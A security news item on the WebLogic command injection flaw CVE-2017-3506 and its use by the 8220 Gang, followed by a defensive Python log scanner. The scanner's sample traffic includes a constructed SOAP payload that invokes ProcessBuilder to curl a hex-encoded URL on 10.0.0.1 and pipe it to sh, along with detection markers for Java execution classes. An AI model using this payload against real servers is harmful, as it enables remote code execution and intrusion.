The US Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw affecting Oracle WebLogic Server to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence that it is being actively exploited in the wild.
The issue, tracked as CVE-2017-3506 (CVSS score: 7.4), is an operating system (OS) command injection vulnerability that could be exploited to gain unauthorized access to, and complete control over, an affected server.
“Oracle WebLogic Server, a product within the Fusion Middleware suite, contains an OS command injection vulnerability that could allow an attacker to execute arbitrary code via a specially crafted HTTP request containing a malicious XML document,” CISA said.
Authorities have not disclosed the nature of the attacks that exploited the vulnerability, but a China-based cryptojacking group known as 8220 Gang, also known as Water Sigbin, has been using it since early last year to integrate unpatched devices into cryptocurrency-mining botnets.
According to a recent report by Trend Micro, the 8220 Gang has been observed exploiting Oracle WebLogic Server vulnerabilities (CVE-2017-3506 and CVE-2023-21839) to launch cryptocurrency miners filelessly in memory, using shell or PowerShell scripts depending on the target operating system.
“The criminal group employed obfuscation techniques such as hex encoding of URLs and use of HTTP over port 443 to enable covert delivery of their payloads,” said security researcher Sunil Bharti. “The PowerShell scripts and the resulting batch files used complex encoding and used environment variables to hide malicious code within seemingly benign script components.”
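The two observables above, a crafted XML document posted to a WebLogic endpoint that names Java command-execution classes, and hex-encoded URLs buried in the payload, are both things a defender can look for in request logs. The script below is an added example written for this page, not code from CISA, Trend Micro or Oracle. It scans constructed HTTP request records and flags both patterns. The endpoint paths in `WLS_WSAT_PATHS`, the class-name markers, the `\xHH` / `%HH` hex-run format and the sample requests are assumptions chosen for illustration; tune them to what your own WebLogic access logs and proxies actually record.

```python
"""Detection example for the article's two observables (added example, not the
page's own code): WebLogic XML command injection and hex-encoded URLs."""
import re
from dataclasses import dataclass, field

# Assumption: WebLogic web-service paths that accept XML POST bodies. These are
# illustrative; confirm against your own deployment's URL space.
WLS_WSAT_PATHS = ("/wls-wsat/", "/_async/")

# Class names a benign WS-AT/SOAP body should never reference (assumption).
XML_EXEC_MARKERS = ("java.beans.XMLDecoder", "java.lang.ProcessBuilder", "java.lang.Runtime")

# A run of at least four \xHH or %HH byte escapes, the hex-URL obfuscation style
# the article describes (the exact escape format is an assumption).
HEX_RUN = re.compile(r"(?:(?:\\x|%)[0-9a-fA-F]{2}){4,}")
HEX_PAIR = re.compile(r"(?:\\x|%)([0-9a-fA-F]{2})")


def decode_hex_runs(text):
    """Decode every hex-escaped run in `text` to ASCII; returns a list of strings."""
    decoded = []
    for m in HEX_RUN.finditer(text):
        raw = bytes.fromhex("".join(HEX_PAIR.findall(m.group(0))))
        decoded.append(raw.decode("ascii", errors="replace"))
    return decoded


@dataclass
class Request:
    method: str
    path: str
    body: str


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)
    decoded_urls: list = field(default_factory=list)


def inspect(req):
    """Return a Finding for a suspicious request, or None if nothing matched."""
    reasons, urls = [], []
    on_wsat = any(req.path.startswith(p) for p in WLS_WSAT_PATHS)
    if req.method == "POST" and on_wsat and "<" in req.body:
        hits = [m for m in XML_EXEC_MARKERS if m in req.body]
        if hits:
            reasons.append("xml-command-injection:" + ",".join(hits))
    # Hex-decode any escaped runs and keep the ones that turn out to be URLs.
    for s in decode_hex_runs(req.body):
        if s.startswith(("http://", "https://")):
            urls.append(s)
    if urls:
        reasons.append("hex-encoded-url")
    return Finding(req.path, reasons, urls) if reasons else None


def scan(requests):
    """Run inspect() over a batch of requests and return only the findings."""
    return [f for f in (inspect(r) for r in requests) if f]


# Constructed sample traffic for this example: one malicious POST whose body
# names ProcessBuilder and carries a hex-escaped download URL, one benign
# WS-AT POST, and one unrelated GET.
SAMPLE_REQUESTS = [
    Request("POST", "/wls-wsat/CoordinatorPortType",
            "<soapenv:Envelope><work:WorkContext><java>"
            "<object class=\"java.lang.ProcessBuilder\"><string>/bin/sh</string>"
            "<string>-c</string><string>curl \\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f"
            "\\x31\\x30\\x2e\\x30\\x2e\\x30\\x2e\\x31\\x2f\\x6d | sh</string>"
            "</object></java></work:WorkContext></soapenv:Envelope>"),
    Request("POST", "/wls-wsat/CoordinatorPortType",
            "<soapenv:Envelope><soapenv:Body><Prepare/></soapenv:Body></soapenv:Envelope>"),
    Request("GET", "/console/login/LoginForm.jsp", ""),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f.path, f.reasons, f.decoded_urls)
```

The hex check decodes runs of escapes rather than looking for any single escape so that ordinary percent-encoded form data does not fire; raise the minimum run length if it is still noisy. The port-443 point in the Trend Micro quote (plain HTTP carried over the TLS port) is not visible in a request record and has to be checked at the proxy or network layer, for example by alerting on non-TLS traffic to port 443 from WebLogic hosts.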
Given that CVE-2017-3506 is being actively exploited in the wild, federal agencies are required to apply the latest patches by June 24, 2024 to protect their networks from potential threats.